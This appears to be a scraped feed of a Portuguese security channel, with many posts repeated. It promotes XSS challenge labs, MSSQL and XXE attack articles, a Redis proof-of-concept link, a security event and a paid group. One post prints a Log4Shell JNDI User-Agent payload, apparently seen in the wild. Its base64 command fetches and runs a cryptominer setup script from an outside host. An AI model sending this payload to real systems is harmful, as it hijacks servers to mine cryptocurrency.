bom dia!
Desafio 3 de xss publicado agora agora
https://brunomenozzi.com/desafios/xss3.php
Nos comentários vou deixar a lista de parametros que os desafios usam (o foco dos labs é sempre não ter um guessing absurdo e mais lógica mesmo) (sim revisei manualmente e o parametro está ali!)
Desafio 3 de xss publicado agora agora
https://brunomenozzi.com/desafios/xss3.php
Nos comentários vou deixar a lista de parametros que os desafios usam (o foco dos labs é sempre não ter um guessing absurdo e mais lógica mesmo) (sim revisei manualmente e o parametro está ali!)
POST NOVO saindo do forno:
https://brunomenozzi.com/posts/MSSQL/alem_do_dumping/
No post "MSSQL: Além do Dumping", abordamos vulnerabilidades críticas no SQL Server que muitos pentesters desconhecem, indo muito além das técnicas tradicionais.
Além do dumping de tabelas e tentativas de RCE, o post cobre:
• SQL Links para movimento lateral entre servidores
• Ownership chaining entre bancos de dados
• Escalação de privilégios via impersonation
• Técnicas de leitura de arquivos via error-based
• Descoberta de conexões de rede ativas
• Abuso de cadeias de confiança (trust chains)
Revelamos como usuários com poucos privilégios podem se tornar sysadmin explorando configurações inadequadas e funcionalidades nativas do MSSQL, transformando uma simples SQL Injection em acesso completo ao ambiente.
https://brunomenozzi.com/posts/MSSQL/alem_do_dumping/
No post "MSSQL: Além do Dumping", abordamos vulnerabilidades críticas no SQL Server que muitos pentesters desconhecem, indo muito além das técnicas tradicionais.
Além do dumping de tabelas e tentativas de RCE, o post cobre:
• SQL Links para movimento lateral entre servidores
• Ownership chaining entre bancos de dados
• Escalação de privilégios via impersonation
• Técnicas de leitura de arquivos via error-based
• Descoberta de conexões de rede ativas
• Abuso de cadeias de confiança (trust chains)
Revelamos como usuários com poucos privilégios podem se tornar sysadmin explorando configurações inadequadas e funcionalidades nativas do MSSQL, transformando uma simples SQL Injection em acesso completo ao ambiente.
Salve. Resolveu esse desafio de xss já? (https://brunomenozzi.com/desafios/xss.php)
Me contaram que o sysadmin publicou a versão 2 dele.
Dê uma olhada se teu payload ainda funciona!
Se sim, manda o alert(1337) de novo!
https://brunomenozzi.com/desafios/xss2.php
Me contaram que o sysadmin publicou a versão 2 dele.
Dê uma olhada se teu payload ainda funciona!
Se sim, manda o alert(1337) de novo!
https://brunomenozzi.com/desafios/xss2.php
Tu manja de xss? Quero ver então!
Que comece a saga dos mini labs!
https://brunomenozzi.com/desafios/xss.php
Manda aqui nos comentários um PRINT (sem expor o payload que tu usou) c/ um alert(1337)!
Nada de self xss / alert no console do navegador ein hahah
Que comece a saga dos mini labs!
https://brunomenozzi.com/desafios/xss.php
Manda aqui nos comentários um PRINT (sem expor o payload que tu usou) c/ um alert(1337)!
Nada de self xss / alert no console do navegador ein hahah
Lá se vai o Bruno compartilhar mais uma entrevista com o James Kettle. Me aguentem. Sou fã.
https://www.youtube.com/watch?v=KxWx9zJuHO0
https://www.youtube.com/watch?v=KxWx9zJuHO0
CVE-2025-49844 (RediShell) - Proof of Concept
Use-After-Free vulnerability in Redis Lua interpreter
https://github.com/raminfp/redis_exploit
Eu dei uma conferida no source, parece autentico e sem fins maliciosos, mas sempre verifiquem e assuma o risco por sua conta
Use-After-Free vulnerability in Redis Lua interpreter
https://github.com/raminfp/redis_exploit
Eu dei uma conferida no source, parece autentico e sem fins maliciosos, mas sempre verifiquem e assuma o risco por sua conta
Alguém on aí pra eu pedir um favor de teste no site (acessar e ficar navegando)?
https://brunomenozzi.com/
https://brunomenozzi.com/
Isso independe do que tu ta executando na tua VPS. No meu caso o blog foi feito com hugo + o tema geekdocs.
Como vocês são hackers, eu vou de site estático mesmo hahaha
Payload:
User Agent: t('${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap${env:NaN:-:}//31.15.16.252:3306/TomcatBypass/Command/Base64/ZXhwb3J0IEhPTUU9L3RtcDsgY3VybCAtcyAtTCBodHRwczovL2Rvd25sb2FkLmMzcG9vbC5vcmcveG1yaWdfc2V0dXAvcmF3L21hc3Rlci9zZXR1cF9jM3Bvb2xfbWluZXIuc2ggfCBMQ19BTEw9ZW5fVVMuVVRGLTggYmFzaCAtcyA0ODZ4cXc3eXNYZEt3N1JrVnpUNXRkU2lEdEU2c294VWRZYUdhR0UxR29hQ2R2QkY3clZnNW9NWEw5cEZ4M3JCMVdVQ1pySnZkNkFITUZXaXBlWXQ1ZUZOVXg5cG1HTg==}')Galera, coloquem em suas agendas os dias e horários pra assistir essa galera de peso! Seguem mais infos:
É com imensa felicidade que anunciamos a OFFSEC FEST, realizada pela LICS | Liga de Cibersegurança da UNICAMP.
Trata-se de um evento online e gratuito, disponível para toda a comunidade de segurança da informação brasileira, na qual reforça a principal tarefa das universidades públicas: a democratização do acesso ao conhecimento.
Palestras:
05/11 - 19h: Francisco Marinho (IT.eam) | Além do SIEM, Técnicas modernas de evasão em ambientes monitorados
11/11 - 12h: Vinicius Vieira (Trustly) | OPSEC for Red Teamers, Como ficar fora da cadeia
19/11 - 19h: Rafael Félix (Hakai) | Utilização de LLMs para facilitar a análise de Malwares
26/11 - 12h: Daniel Marques (EY) | Amplificando ataques de phishing com I.A generativa
Link de inscrição: https://forms.gle/SSkYtabVhhHMDwHCA
É com imensa felicidade que anunciamos a OFFSEC FEST, realizada pela LICS | Liga de Cibersegurança da UNICAMP.
Trata-se de um evento online e gratuito, disponível para toda a comunidade de segurança da informação brasileira, na qual reforça a principal tarefa das universidades públicas: a democratização do acesso ao conhecimento.
Palestras:
05/11 - 19h: Francisco Marinho (IT.eam) | Além do SIEM, Técnicas modernas de evasão em ambientes monitorados
11/11 - 12h: Vinicius Vieira (Trustly) | OPSEC for Red Teamers, Como ficar fora da cadeia
19/11 - 19h: Rafael Félix (Hakai) | Utilização de LLMs para facilitar a análise de Malwares
26/11 - 12h: Daniel Marques (EY) | Amplificando ataques de phishing com I.A generativa
Link de inscrição: https://forms.gle/SSkYtabVhhHMDwHCA
ei, já almoçou?!
Agora clica no link para ler o conteúdo que eu tinha te falado ontem!
"Como sair dos duplicados em Bugbounty?"
https://brunomenozzi.com/VIP/como_sair_de_duplicados_part1/
Essa é a parte 1 da nossa saga! Espero que gere alguns insights pra ti.
Agora clica no link para ler o conteúdo que eu tinha te falado ontem!
"Como sair dos duplicados em Bugbounty?"
https://brunomenozzi.com/VIP/como_sair_de_duplicados_part1/
Essa é a parte 1 da nossa saga! Espero que gere alguns insights pra ti.
Entre hoje e amanhã vou postar no nosso site uma prévia textual com o assunto:
"Como sair dos duplicados em Bugbounty?"
O texto na página é uma forma de não deixar vocês de fora da saga que nosso grupo VIP está tendo (Imagem que enviei agora)!
Se tu quiser uma explicação mais detalhada desse assunto e outros, cola com a gente no grupo VIP. Mais informações no link a seguir:
https://t.me/zeroc00i_news/475
Tem muitos cenários além dos payloads básicos do XXE
To construindo essa página aqui para falar um pouco mais disso.
Alguns highlights:
- Já encontrei em bugbounty um XXE no parâmetro SAMLResponse de uma aplicação, que por padrão já espera um formato XML.
- Parece simples, mas muitas vezes explorar um XXE sabendo a sintaxe certa de uma requisição SOAP, pode te dar uma dor de cabeça.
Leia mais em: https://brunomenozzi.com/posts/XXE/introducao/
ALERTA DE SEGURANÇA
... a maioria é falso positivo, mas essa call aqui é boa pra ti!
Galera, de tarde fiz a abertura do grupo premium que eu havia falado uns dias atrás
Resolvi, agora com mais tempo, fazer um vídeo para vocês explicando sobre essa iniciativa de abertura de um grupo premium e o que te espera!
O link para a página é esse 💪:
➡ https://lastlink.com/p/C68E8B1EA/
... a maioria é falso positivo, mas essa call aqui é boa pra ti!
Galera, de tarde fiz a abertura do grupo premium que eu havia falado uns dias atrás
Resolvi, agora com mais tempo, fazer um vídeo para vocês explicando sobre essa iniciativa de abertura de um grupo premium e o que te espera!
O link para a página é esse 💪:
➡ https://lastlink.com/p/C68E8B1EA/
🔥 Pessoal, inscrições pro Grupo premium abertas! 🔥
Acesse o link a seguir e garante tua vaga já!
➡ https://lastlink.com/p/C68E8B1EA/
Ainda hoje vou falar com vocês por lá.
Nos vemos em breve =)
SIMBORAAA
By Zeroc00i
Acesse o link a seguir e garante tua vaga já!
➡ https://lastlink.com/p/C68E8B1EA/
Ainda hoje vou falar com vocês por lá.
Nos vemos em breve =)
SIMBORAAA
By Zeroc00i